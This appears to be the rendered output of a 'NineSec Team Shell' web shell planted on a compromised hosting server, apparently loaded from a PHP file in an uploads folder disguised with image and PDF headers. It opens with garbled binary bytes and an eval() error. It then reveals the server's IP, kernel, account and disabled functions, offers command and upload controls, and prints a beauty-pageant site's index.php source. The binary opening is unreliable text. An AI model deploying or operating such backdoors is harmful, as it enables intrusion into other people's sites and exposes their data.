JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 C  %PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress
Warning: file_get_contents(test.txt): Failed to open stream: No such file or directory in /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/1770357389_0_197006009.php(44) : eval()'d code on line 6
NineSec Team Shell
NineSec Team Shell
Server IP : 82.25.113.252  /  Your IP : 216.73.216.172
Web Server : LiteSpeed
System : Linux fr-int-web2058.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u178500310 ( 178500310)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u178500310/domains/pinkrosesentertainment.com/public_html/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/u178500310/domains/pinkrosesentertainment.com/public_html/index.php
<?php
include 'db_connect.php'; // Include your database connection file

// Fetch only featured submissions
$photos_data = [];
$result = $conn->query("SELECT * FROM photo_submissions WHERE is_featured = 1 ORDER BY created_at DESC");

if ($result && $result->num_rows > 0) {
    while ($row = $result->fetch_assoc()) {
        $photos_data[] = $row;
    }
}




$sql = "SELECT * FROM banners ORDER BY id DESC LIMIT 1";
$result = $conn->query($sql);

if ($result && $result->num_rows > 0) {
    $row = $result->fetch_assoc();
    $banners = [];

    if (!empty($row['main_banner'])) {
        $banners[] = $row['main_banner'];
    }
    if (!empty($row['secondary_banner'])) {
        $banners[] = $row['secondary_banner'];
    }
    if (!empty($row['event_banner'])) {
        $banners[] = $row['event_banner'];
    }





    if ($result && $result->num_rows > 0) {
        $row = $result->fetch_assoc();

        $images = [];

        if (!empty($row['photo1'])) $images[] = $row['photo1'];
        if (!empty($row['photo2'])) $images[] = $row['photo2'];
        if (!empty($row['photo3'])) $images[] = $row['photo3'];

        foreach ($images as $index => $img) {
            echo '<div class="col-lg-4 col-md-4 col-sm-6">
                <div class="abt-img wow fadeInLeft" data-wow-duration="100ms">
                    <img loading="lazy" src="' . $img . '" class="img-fluid" alt="Achievement ' . ($index + 1) . '" />
                    <a href="' . $img . '" title="View Full Image" class="html5lightbox">
                        <i class="fa fa-search"></i>
                    </a>
                </div>
            </div>';
        }
    } else {
        echo '<p>No achievements uploaded yet.</p>';
    }






    include 'db_connect.php';

    $session = 'session6';

    $sql = "SELECT * FROM photos WHERE session = '$session' AND is_featured = 1 ORDER BY id DESC";
    $result = $conn->query($sql);

?>

    <!DOCTYPE html>
    <html>

    <!--  -->


    <!-- Mirrored from www.tiskapageants.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 16 Jun 2025 08:24:52 GMT -->
    <!-- Added by HTTrack -->
    <meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->

    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8">

        <meta name="viewport" content="width=device-width, initial-scale=1">
        <!-- Global site tag (gtag.js) - Google Analytics -->
        <link rel="shortcut icon" href="assets/images/logoO/pinkNW.png" type="image/x-icon">
        <link rel="icon" href="assets/images/logoO/pinkNW.png" type="image/x-icon">
        <link rel="canonical" href="index.html" />
        <meta name="author" content="Digital Nawab || @unosaleem">
        <!--<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/css/bootstrap.min.css">-->
        <!--<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>-->
        <!--<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/js/bootstrap.min.js"></script>-->
        <title> Miss &amp; Mrs. India Registrations 2025 Open | Beauty Pageant</title>
        <!--    Meta  - Description  -->
        <meta name="description"
            content="Participate in India&#039;s most prestigious beauty pageant “Tiska Miss &amp; Mrs India” 2025 today. Online registrations are open for Indian women. Register now!!" />
        <link href="assets/css/bootstrap.min.css" rel="stylesheet">
        <link href="assets/css/animate.min.css" rel="stylesheet">
        <link href="assets/js/lib/slick/slick.css" rel="stylesheet">
        <link href="assets/js/lib/slick/slick-theme.css" rel="stylesheet">
        <link href="assets/css/animate.min.css" rel="stylesheet">
        <link href="assets/css/style.css" rel="stylesheet">
        <link href="assets/css/responsive.css" rel="stylesheet">
        <link href="assets/css/dark-color.css" rel="stylesheet">
        <link href="assets/css/unosaleem.css" rel="stylesheet"> <!--====   reCAPTCHA_site_key ====-->
        <script src="../www.google.com/recaptcha/api2310.js?render=6LdYktkqAAAAAJcxVRCgz33EhxLs1iSxM18TSnt5"></script>
        <!--====    css custom link ====-->
        <script>
            // reCAPTCHA_site_key
            grecaptcha.ready(function() {
                // use site keys from https://www.google.com/recaptcha/admin
                grecaptcha.execute('6LdYktkqAAAAAJcxVRCgz33EhxLs1iSxM18TSnt5', {
                    action: 'submit'
                }).then(function(token) {
                    document.getElementById('recaptcha_token').value = token;
                });
            });
        </script>

        <meta name="google-site-verification" content="3gjBHn9Q71HudZt9P2vyxmkZW4o79eTTFieHht3ZBhw" />
        <meta name="facebook-domain-verification" content="ouwjnr2n1q28kwxbj7mtu6jzaxhpoy" />

        <meta name="statvooVerification" content="20e7f2275ef5bfdefe71717ae44713fd" />

        <script type='application/ld+json'>
            {
                "@context": "http://www.schema.org",
                "@type": "product",
                "brand": "Beauty Pageant",
                "name": "Tiska Miss & Mrs. India",
                "image": "https://www.tiskapageants.com/assets/images/icn-logo.png",
                "description": "Tiska Miss & Mrs. India is a unique blend of glamour and elegance contrary to the traditional state of pageantry, available on both state and national levels.",
                "aggregateRating": {
                    "@type": "aggregateRating",
                    "ratingValue": "4.4",
                    "reviewCount": "14752"
                }
            }
        </script>

        <!-- Google Tag Manager -->
        <script>
            (function(w, d, s, l, i) {
                w[l] = w[l] || [];
                w[l].push({
                    'gtm.start': new Date().getTime(),
                    event: 'gtm.js'
                });
                var f = d.getElementsByTagName(s)[0],
                    j = d.createElement(s),
                    dl = l != 'dataLayer' ? '&l=' + l : '';
                j.async = true;
                j.src =
                    '../www.googletagmanager.com/gtm5445.html?id=' + i + dl;
                f.parentNode.insertBefore(j, f);
            })(window, document, 'script', 'dataLayer', 'GTM-NBNZ8XJ');
        </script>
        <!-- End Google Tag Manager -->

        <!-- Facebook Pixel Code -->
        <script>
            ! function(f, b, e, v, n, t, s) {
                if (f.fbq) return;
                n = f.fbq = function() {
                    n.callMethod ?
                        n.callMethod.apply(n, arguments) : n.queue.push(arguments)
                };
                if (!f._fbq) f._fbq = n;
                n.push = n;
                n.loaded = !0;
                n.version = '2.0';
                n.queue = [];
                t = b.createElement(e);
                t.async = !0;
                t.src = v;
                s = b.getElementsByTagName(e)[0];
                s.parentNode.insertBefore(t, s)
            }(window, document, 'script',
                '../connect.facebook.net/en_US/fbevents.js');
            fbq('init', '253843465746601');
            fbq('track', 'PageView');
        </script>
        <noscript><img height="1" width="1" style="display:none"
                src="https://www.facebook.com/tr?id=253843465746601&amp;ev=PageView&amp;noscript=1" /></noscript>
        <!-- End Facebook Pixel Code -->

        <!-- Global site tag (gtag.js) - Google Analytics -->
        <script async src="https://www.googletagmanager.com/gtag/js?id=UA-162110371-1"></script>
        <script>
            window.dataLayer = window.dataLayer || [];

            function gtag() {
                dataLayer.push(arguments);
            }
            gtag('js', new Date());

            gtag('config', 'UA-162110371-1');
        </script>
        <!-- Global site tag (gtag.js) - Google Ads: 10860574609 -->
        <script async src="https://www.googletagmanager.com/gtag/js?id=AW-10860574609"></script>
        <script>
            window.dataLayer = window.dataLayer || [];

            function gtag() {
                dataLayer.push(arguments);
            }
            gtag('js', new Date());

            gtag('config', 'AW-10860574609');
        </script>


        <style>
            .team-sec-details .team-detail .cmntr-img {
                float: none;
                width: 100%;

            }

            html5lightbox-web-iframe .shrinkToFit {
                cursor: zoom-in;
                margin: 0 auto !important;
            }

            #more {
                display: none;
            }

            .sec-padding {
                padding: 30px 0;
            }

            .team-sec-details .team-detail .cmntr-img .hex-inner {
                width: 100%;
                height: 100%;
            }

            .color {
                background: #ef6faa !Important;
            }

            .btn-stic {
                /*background: #080015 ;}*/
                background: #075e54;
            }

            .bn-links a {
                cursor: pointer;
            }

            .vfdfd ul li {
                padding: 8px 0 !important;
                font-size: 15px !important;
            }

            .banner-slide .bn-hd span:before,
            .banner-slide .bn-hd span:after {
                display: none;
            }

            .banner-slide .ben-head {
                text-shadow: 2px 2px rgb(13 14 14);
            }

            h1 {
                float: left;
                color: #ffffff;
                font-size: 24px;
                font-weight: 800;
                text-transform: uppercase;
                margin-top: 13px;
                padding-left: 1px;
            }

            .lod-img {
                width: 100%;
                padding: 10px 20px;
                text-align: center;
            }

            .reg-form {
                float: left;
                width: 100%;
                background-color: #0d1d31;
                padding: 10px;
                -webkit-border-radius: 10px;
                -ms-border-radius: 10px;
                border-radius: 10px;
            }

            .btn-bd {
                display: none;
                z-index: 9999;
            }

            .dark-vz {
                background-color: #08080a;
            }

            .doc-sec,
            .contact-sec {
                background-color: #0f0f13;
            }

            .abt-imgs .abt-img .no-border img {
                border-radius: none !important;
                border: none !important;
            }

            div#html5-elem-box {
                margin-top: 150px !important;
            }

            @media only screen and (max-width: 600px) {
                .bn-links li a:hover {
                    color: #af547e;
                }

                .bn-links li a {
                    color: #af547e;
                    border: 1px solid #ef6faa;
                    font-size: 20px;
                    font-weight: 800;
                }

                .reg-form.row {
                    display: block;
                }

                .faqs-sec-details .ques-details ul li,
                footer p,
                p,
                .about-sec-details p {
                    font-size: 16px !important;
                    line-height: 22px !important;
                }

                .slick-prev,
                .slick-next {
                    display: block !important;
                }

                .scrollTop.active {
                    bottom: 40px;
                    box-shadow: 0 0 8px #000;
                }

                .reg-form .lod-img {
                    width: 32%;
                }

                .banner-carousel {
                    float: left;
                    width: 100%;
                    height: 360px;
                }
            }

            img.shrinkToFit {
                margin: 0 auto !important;
            }
        </style>
        <style>
            .pd-15 {
                padding: 15px
            }

            .marquee {
                display: inline-block;
                white-space: nowrap;
                font-size: 20px;
                color: #fff;
                padding: 10px
            }

            .ul-ch {
                font-size: 18px;
                text-align: justify;
                line-height: 2
            }

            .marquee:hover {
                animation-play-state: paused
            }

            @keyframes scrollLeft {
                0% {
                    transform: translateX(0)
                }

                100% {
                    transform: translateX(-100%)
                }
            }

            .modal {
                position: fixed;
                top: 100px;
                right: 0;
                bottom: 0;
                left: 0;
                z-index: 1050;
                display: none;
                overflow: hidden;
                outline: 0
            }

            .modal-body h1 {
                font-weight: 900;
                font-size: 2.3em;
                text-transform: uppercase
            }

            .modal-body a.pre-order-btn {
                color: #fff;
                background-color: #ed70aa;
                padding: 1em;
                display: block;
                margin: 2em auto;
                width: 50%;
                font-size: 1.25em;
                font-weight: 6600
            }

            .modal-body a.pre-order-btn:hover {
                background-color: #ed70aa;
                text-decoration: none;
                color: #fff
            }

            .btn-primary {
                color: #fff;
                background-color: #ff58a0;
                border-color: #ef6ea9
            }

            .modal-open .modal {
                overflow-x: hidden;
                overflow-y: hidden
            }

            .cheif-images {
                width: 100% !important
            }
        </style>

    </head>

    <body class="dark-vz">


        <div class="theme-layout">

            <!-- Main Header-->
            <header class="main-header header-style-two ">
                <style>
                    .nav>li>a:focus,
                    .nav>li>a:hover {
                        text-decoration: none;
                        background-color: #ef6faa !important;
                    }

                    .navbar-light .navbar-nav .nav-link {
                        color: #fff;
                    }

                    .dropdown-menu.show {
                        background: #696d72;
                    }

                    .dropdown-menu {
                        background: #686c71;
                    }

                    .dropdown:hover .dropdown-menu {
                        display: block;
                    }

                    .dropdown-item {
                        color: #fff;
                    }

                    .dropdown-item:hover {
                        color: #ee6ea9;
                    }

                    /*==== responsive Mobile ======*/
                    @media only screen and (max-width: 600px) {
                        .nav.navbar-nav.ml-auto {
                            width: 100%;
                        }

                        .navbar.navbar-expand-md.navbar-light {

                            background: #736e6ef0;

                        }

                        .main-header.fixed.animated.slideDown {

                            padding: 0 !important;
                            margin: 0 !important;
                        }
                    }
                </style>
                <!-- footer style -->
                <style>
                    /* Footer-specific styles - scoped to #custom-footer only */
                    #custom-footer {
                        background: black;
                        color: #f0f0f0;
                        font-family: 'Poppins', sans-serif;
                        padding: 80px 20px 30px;
                        position: relative;
                        overflow: hidden;
                        box-shadow: 0 -10px 30px rgba(0, 0, 0, 0.3);
                    }

                    #custom-footer::before {
                        content: '';
                        position: absolute;
                        top: 0;
                        left: 0;
                        width: 100%;
                        height: 4px;
                        background: linear-gradient(90deg, #ff8a00 0%, #e52e71 50%, #ff8a00 100%);
                        animation: gradientBG 15s ease infinite;
                        background-size: 400% 400%;
                    }




                    .custom-footer-container {
                        max-width: 1200px;
                        margin: 0 auto;
                        position: relative;
                        z-index: 1;
                    }

                    .custom-footer-grid {
                        display: grid;
                        grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
                        gap: 40px;
                    }

                    .custom-footer-col {
                        position: relative;
                        padding-top: 50px;
                        /* Space for absolute positioned h4 */
                    }

                    .custom-footer-col h4 {
                        color: #fff;
                        margin: 0;
                        font-weight: 600;
                        font-size: 18px;
                        position: absolute;
                        top: 0;
                        left: 0;
                        padding-bottom: 10px;
                    }

                    .custom-footer-col h4::after {
                        content: '';
                        position: absolute;
                        left: 0;
                        bottom: 0;
                        width: 50px;
                        height: 2px;
                        background: linear-gradient(90deg, #ff8a00, #e52e71);
                    }

                    .custom-footer-col p,
                    .custom-footer-col li,
                    .custom-footer-col a {
                        color: #ddd;
                        font-size: 15px;
                        line-height: 1.8;
                        text-decoration: none;
                        transition: all 0.3s ease;
                    }

                    .custom-footer-col p {
                        margin: 0 0 15px 0;
                        text-align: left;
                    }

                    .custom-footer-col ul {
                        list-style: none;
                        padding: 0;
                        margin: 0;
                    }

                    .custom-footer-col ul li {
                        margin-bottom: 12px;
                        display: flex;
                        align-items: flex-start;
                    }

                    .custom-footer-col ul li i {
                        margin-right: 10px;
                        color: #ff8a00;
                        min-width: 20px;
                        text-align: center;
                        font-size: 16px;
                        margin-top: 3px;
                        /* Better icon alignment */
                    }

                    .custom-footer-col a:hover {
                        color: #fff;
                        padding-left: 5px;
                        text-shadow: 0 0 5px rgba(255, 255, 255, 0.3);
                    }

                    .footer-logo {
                        max-width: 180px;
                        margin-bottom: 20px;
                        transition: all 0.3s ease;
                        display: block;
                    }

                    .footer-logo:hover {
                        transform: scale(1.05);
                    }

                    .social-icons {
                        margin-top: 20px;
                        display: flex;
                        gap: 15px;
                        flex-wrap: wrap;
                    }

                    .social-icons a {
                        display: inline-flex;
                        align-items: center;
                        justify-content: center;
                        width: 40px;
                        height: 40px;
                        background: rgba(255, 255, 255, 0.1);
                        backdrop-filter: blur(5px);
                        color: #fff;
                        font-size: 18px;
                        border-radius: 50%;
                        transition: all 0.3s ease;
                        box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
                    }

                    .social-icons a:hover {
                        background: linear-gradient(45deg, #ff8a00, #e52e71);
                        color: #fff;
                        transform: translateY(-5px);
                        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2);
                    }

                    .custom-footer-bottom {
                        padding-top: 30px;
                        margin-top: 50px;
                        text-align: center;
                        font-size: 14px;
                        position: relative;
                    }

                    .custom-footer-bottom::before {
                        content: '';
                        position: absolute;
                        top: 0;
                        left: 50%;
                        transform: translateX(-50%);
                        width: 200px;
                        height: 1px;
                        background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.3), transparent);
                    }

                    .custom-footer-bottom p {
                        margin: 0;
                        color: #aaa;
                        letter-spacing: 0.5px;
                    }

                    .custom-footer-bottom a {
                        color: #ff8a00;
                        text-decoration: none;
                        font-weight: 500;
                        transition: all 0.3s ease;
                    }

                    .custom-footer-bottom a:hover {
                        color: #e52e71;
                        text-decoration: none;
                    }

                    /* Animations */
                    @keyframes float {
                        0% {
                            transform: translateY(0px);
                        }

                        50% {
                            transform: translateY(-10px);
                        }

                        100% {
                            transform: translateY(0px);
                        }
                    }

                    @keyframes gradientBG {
                        0% {
                            background-position: 0% 50%;
                        }

                        50% {
                            background-position: 100% 50%;
                        }

                        100% {
                            background-position: 0% 50%;
                        }
                    }

                    #custom-footer::after {
                        content: '';
                        position: absolute;
                        bottom: -50px;
                        right: -50px;
                        width: 200px;
                        height: 200px;
                        background: radial-gradient(circle, rgba(255, 138, 0, 0.1) 0%, rgba(229, 46, 113, 0) 70%);
                        animation: float 6s ease-in-out infinite;
                        z-index: 0;
                    }

                    /* Adding a second floating element */
                    #custom-footer::before {
                        content: '';
                        position: absolute;
                        top: 20%;
                        left: -50px;
                        width: 200px;
                        height: 200px;
                        background: radial-gradient(circle, rgba(229, 46, 113, 0.1) 0%, rgba(229, 46, 113, 0) 70%);
                        animation: float 8s ease-in-out infinite 2s;
                        z-index: 0;
                    }

                    /* Responsive adjustments */
                    @media (max-width: 768px) {
                        .custom-footer-grid {
                            grid-template-columns: 1fr;
                            gap: 50px;
                        }

                        .custom-footer-col {
                            text-align: center;
                            padding-top: 60px;
                        }

                        .custom-footer-col h4 {
                            left: 50%;
                            transform: translateX(-50%);
                            width: 100%;
                            text-align: center;
                        }

                        .custom-footer-col h4::after {
                            left: 50%;
                            transform: translateX(-50%);
                        }

                        .social-icons {
                            justify-content: center;
                        }

                        .custom-footer-col ul li {
                            justify-content: center;
                        }

                        .custom-footer-col p {
                            text-align: center;
                        }
                    }
                </style>
                <!-- footer style end -->
                <div class="bs-example">
                    <nav class="navbar navbar-expand-md navbar-light ">

                        <a href="index.php" class="navbar-brand">
                            <img src="assets/images/logoO/pinkNW.png" alt="tiska" width="70"
                                class="img-responsive logoTs" />

                        </a>
                        <button type="button" class="navbar-toggler" data-toggle="collapse" data-target="#navbarCollapse">
                            <span class="navbar-toggler-icon"></span>
                        </button>
                        <div id="navbarCollapse" class="collapse navbar-collapse">
                            <ul class="nav navbar-nav ml-auto">

                                <li class="nav-item"><a class='active' href="index.php">Home</a></li>

                                <li class="nav-item"><a href="about-us.php">About Us</a> </li>

                                <li class="nav-item dropdown">
                                    <a href="#" class="nav-link dropdown-toggle" data-toggle="dropdown">audition</a>
                                    <div class="dropdown-menu">
                                        <a href="nwTeam.php" class="dropdown-item">Team</a>
                                        <div class="dropdown-divider"></div>
                                        <a href="nwjury.php" class="dropdown-item">jury</a>

                                    </div>
                                </li>


                                <li class="nav-item"><a href="achive.php">Achievement</a></li>
                                <!-- <li class="nav-item"><a href="nwGallery.html" >Gallery</li> -->
                                <li class="nav-item dropdown">
                                    <a href="#" class="nav-link dropdown-toggle" data-toggle="dropdown">Media</a>
                                    <div class="dropdown-menu">
                                        <a href="nwGallery.php" class="dropdown-item">Gallery</a>
                                        <div class="dropdown-divider"></div>
                                        <a href="video.php" class="dropdown-item">Video</a>
                                        <div class="dropdown-divider"></div>
                                        <a href="events.php" class="dropdown-item">Events</a>
                                    </div>
                                </li>
                                <li><a href="social.html">Social</a></li>
                                <li class="nav-item"><a href="registration.php">Registration</a></li>
                                <li><a href="nwcontact.html">Contact Us</a></li>


                                <!-- <li class="nav-item dropdown">
                    <a href="#" class="nav-link dropdown-toggle" data-toggle="dropdown">Achievement</a>
                    <div class="dropdown-menu">
                        <a href="mysore-fashion-week.html" class="dropdown-item"> Mysore Fashion Week</a>
                        <div class="dropdown-divider"></div>
                        <a href="times-fashion-week.html" class="dropdown-item">Times Fashion Week</a>
                        <div class="dropdown-divider"></div>
                        <a href="https://www.tiskapageants.com/media" class="dropdown-item">Media</a>
                        
                    </div>
                </li> -->

                                <!-- <li class="nav-item dropdown">
                    <a href="#" class="nav-link dropdown-toggle" data-toggle="dropdown">Gallery</a>
                    <div class="dropdown-menu">
                        <a href="https://www.tiskapageants.com/gallery" class="dropdown-item">Gallery Season 1</a>
                        <div class="dropdown-divider"></div>
                        <a href="https://www.tiskapageants.com/gallery-season-2" class="dropdown-item">Gallery Season 2</a>
                        
                        <div class="dropdown-divider"></div>
                    <a href="https://www.tiskapageants.com/gallery-season-3" class="dropdown-item">Gallery Season 3</a>
                    <div class="dropdown-divider"></div>
                    <a href="https://www.tiskapageants.com/gallery-season-4" class="dropdown-item">Gallery Season 4</a>
                    </div>
                </li> -->


                            </ul>

                        </div>
                    </nav>
                </div>
            </header>
            <!--End Main Header -->
            <div style="padding-top:75px">

                <!-- Modal -->
                <div id="popupModal" class="modal fade" role="dialog" aria-labelledby="modalTitle" aria-hidden="true">
                    <div class="modal-dialog">
                        <div class="modal-content">
                            <div class="modal-header">
                                <h4 class="modal-title" id="modalTitle">Pink Roses Entertainment</h4>
                                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                                    <span aria-hidden="true">&times;</span>
                                </button>
                            </div>
                            <div class="modal-body text-center">
                                <img src="assets/images/nw-added/cover-hk.jpg "
                                    alt="Mobile Image for Pink Roses Entertainment" class="img-fluid" loading="lazy">
                                <a class="btn btn-primary mt-3 mb-2" href="registration.php"
                                    title="Open Registration Page">Registration Open</a>
                            </div>
                        </div>
                    </div>
                </div>

                <!-- Carousel Section -->
                <div id="demo" class="carousel slide" data-ride="carousel" data-interval="3000">
                    <div class="carousel-inner">
                    <?php
                    foreach ($banners as $index => $banner) {
                        $active = ($index === 0) ? 'active' : '';
                        echo '<div class="carousel-item ' . $active . '">';
                        echo '<img src="' . $banner . '" alt="Slider ' . ($index + 1) . '" class="d-block w-100" loading="lazy">';
                        echo '</div>';
                    }
                } else {
                    echo '<div class="carousel-item active">
            <img src="assets/images/default-slider.jpg" class="d-block w-100" alt="Default Slide">
        </div>';
                }
                    ?>
                    </div>
                    <a class="carousel-control-prev" href="#demo" role="button" data-slide="prev" aria-label="Previous">
                        <span class="carousel-control-prev-icon" aria-hidden="true"></span>
                    </a>
                    <a class="carousel-control-next" href="#demo" role="button" data-slide="next" aria-label="Next">
                        <span class="carousel-control-next-icon" aria-hidden="true"></span>
                    </a>
                </div>






                <section class="about-sec sec-padding" id="about" data-scroll-index="1">
                    <div class="container">
                        <div class="sec-title">
                            <span class="icon-inner wow flipInY" data-wow-duration="300ms">
                                <span class="fa-stack">
                                    <i class="fa rhex fa-stack-2x"></i>
                                    <i class="fa fa-star fa-stack-1x"></i>
                                </span>
                            </span>
                            <h1 class="wow fadeInRight" data-wow-duration="500ms">Pink Roses Entertainment <span
                                    class="pink">2025</span> - Mr. & Mrs. India International</h1>
                        </div>
                        <!--sec-title end-->

                        <div class="about-sec-details">
                            <div class="row">
                                <div class="col-lg-12">
                                    <div class="about-info">
                                        <p class="wow fadeInUp" data-wow-duration="300ms">
                                            The <span class="pink">'Pink Roses Entertainment'</span> is proud to announce
                                            the upcoming Mr. & Mrs. India International, a prestigious national-level
                                            pageant going to be organized to celebrate
                                        </p>

                                        <p class="wow fadeInUp" data-wow-duration="500ms">
                                            confidence, talent, and individuality. This grand event will offer a platform
                                            for aspiring individuals to shine, express themselves, and represent India with
                                            pride and elegance on a global stage.
                                        </p>

                                        <span id="dots"></span>
                                        <span id="more">
                                            <!-- <p class="wow fadeInUp" data-wow-duration="500ms">
                            we are dedicated to showcasing fresh faces and bold ideas. Stay tuned for our upcoming event — where style meets spotlight!
                            </p> -->
                                            <!-- <p class="wow fadeInUp" data-wow-duration="500ms">
                                The aim of Tiska is to empower women by giving them opportunities to grow and build a positive self-image. We help foster self-confidence by providing opportunities to develop talents and public speaking skills. Tiska creates long-lasting memories and experiences through these beauty pageants.
                            </p> -->
                                        </span>

                                    </div>
                                    <!--about-info end-->
                                </div>
                            </div>
                        </div>
                    </div>
                </section>


                <section class="team-sec sec-padding" id="speakers" data-scroll-index="4">
                    <div class="container">
                        <div class="sec-title">
                            <span class="icon-inner wow flipInY" data-wow-duration="300ms">
                                <span class="fa-stack">
                                    <i class="fa rhex fa-stack-2x"></i>
                                    <i class="fa fa-user fa-stack-1x"></i>
                                </span>
                            </span>
                            <?php if (!empty($photos_data)): ?>
                                <?php foreach ($photos_data as $entry): ?>
                                    <h3>OUR WINNERS <span class="pink"></span></h3>
                        </div>
                        <!-- sec-title end -->

                        <div class="year-section">
                            <div class="row"> <?php
                                                // Loop through each photo (photo1, photo2, etc.) for the current entry
                                                for ($i = 1; $i <= 4; $i++) {
                                                    $photo_column = 'photo' . $i;
                                                    $photo_filename = htmlspecialchars($entry[$photo_column]);
                                                    $image_src = "uploads/" . $photo_filename;

                                                    // Only display if the filename is not empty
                                                    if (!empty($photo_filename)) {
                                                ?>
                                        <div class="col-md-3 col-sm-6 mb-4">
                                            <div class="team-detail wow fadeInUp" data-wow-duration="900ms">
                                                <div class="">
                                                    <figure class="hex-inner abt-img wow fadeInLeft" data-wow-duration="900ms">
                                                        <div class="img-wrapper">
                                                            <img loading="lazy" src="<?php echo $image_src; ?>" class="img-fluid"
                                                                alt="Photo for <?php echo htmlspecialchars($entry['year']); ?>"
                                                                width="900" height="900">
                                                        </div>
                                                        <figcaption>
                                                            <a href="<?php echo $image_src; ?>" title="View Full Image"
                                                                class="html5lightbox">
                                                            </a>
                                                        </figcaption>
                                                    </figure>
                                                </div>
                                            </div>
                                        </div>
                                <?php
                                                    }
                                                }
                                ?>
                            </div>
                        </div>
                    <?php endforeach; ?>
                <?php else: ?>
                    <p>No photos available in the gallery.</p>
                <?php endif; ?>

                <!-- team-detail end -->
                    </div>
            </div>
            </section>


            <section class="dark-vz sec-padding">
                <div class="container">
                    <div class="sec-title">
                        <span class="icon-inner wow flipInY" data-wow-duration="300ms">
                            <span class="fa-stack"><i class="fa rhex fa-stack-2x"></i><i
                                    class="fa fa-ticket fa-stack-1x"></i></span>
                        </span>
                        <h3 class="wow fadeInRight" data-wow-duration="500ms">Events <span class="pink">Chief
                                Guest</span> <small></small></h3>
                    </div>
                    <!--sec-title end-->
                    <div class="doc-sec-details">
                        <div class="abt-imgs">
                            <div class="row text-center">
                                <div class="col-lg-6">
                                    <div class="row">
                                        <div class=col-md-3></div>
                                        <div class=col-md-6>
                                            <img loading="lazy" src="assets/images/nw-added/Rahul3.png"
                                                class="img-responsive cheif-images" alt="Miss India Registration" />
                                        </div>
                                        <div class=col-md-3></div>
                                    </div>
                                    <div class="about-info mt-4">
                                        <h2 class="wow fadeInRight mb-2" data-wow-duration="500ms"
                                            style="font-size: 30px;"><span class="pink">Rahul Roy</span> <small></small>
                                        </h2>
                                        <p class="mb-2">Celebrity Actor</p>
                                        <p class="text-justify wow fadeInUp" data-wow-duration="500ms"
                                            style="font-size: 14px;">
                                            Rahul Roy is a celebrated Indian actor known for his iconic debut role that
                                            became a cultural phenomenon in Bollywood. He gained massive recognition for
                                            his romantic lead performances and quickly became a household name. Beyond
                                            films, Rahul made a mark by winning a popular national reality show,
                                            showcasing his versatility and strong public appeal. With a legacy rooted in
                                            charm, talent, and resilience, he continues to inspire fans across
                                            generations.
                                        </p>
                                        <!-- <p class="text-justify wow fadeInUp" data-wow-duration="500ms" > <i class="fa fa-star pink" aria-hidden="true"></i> Aditi Govitrikar is an Indian actress, physician, and former fashion model.</p>
                            <p class="text-justify wow fadeInUp" data-wow-duration="500ms" > <i class="fa fa-star pink" aria-hidden="true"></i> She is the only Indian woman to win Mrs. World title in 2001</p>
                            <p class="text-justify wow fadeInUp" data-wow-duration="500ms" > <i class="fa fa-star pink" aria-hidden="true"></i> From 1997 until 2004, Govitrikar remains the only Indian supermodel with both a medical doctor and a psychologist qualification.</p> -->

                                        <!--about-info end-->
                                    </div>
                                </div>
                                <div class="col-lg-6">
                                    <div class="row">
                                        <div class=col-md-3></div>
                                        <div class=col-md-6>
                                            <img loading="lazy" src="assets/images/nw-added/Image 2025.jpeg"
                                                class="img-responsive cheif-images" alt="Miss India Registration" />
                                        </div>
                                        <div class=col-md-3></div>
                                    </div>
                                    <div class="about-info mt-4">
                                        <h2 class="wow fadeInRight mb-2" data-wow-duration="500ms"
                                            style="font-size: 30px;"><span class="pink">Hina Kauser</span> <small></small>
                                        </h2>
                                        <p class="mb-2">Mrs. Asia Winner 2019</p>
                                        <p class="text-justify wow fadeInUp" data-wow-duration="500ms"
                                            style="font-size: 14px;">
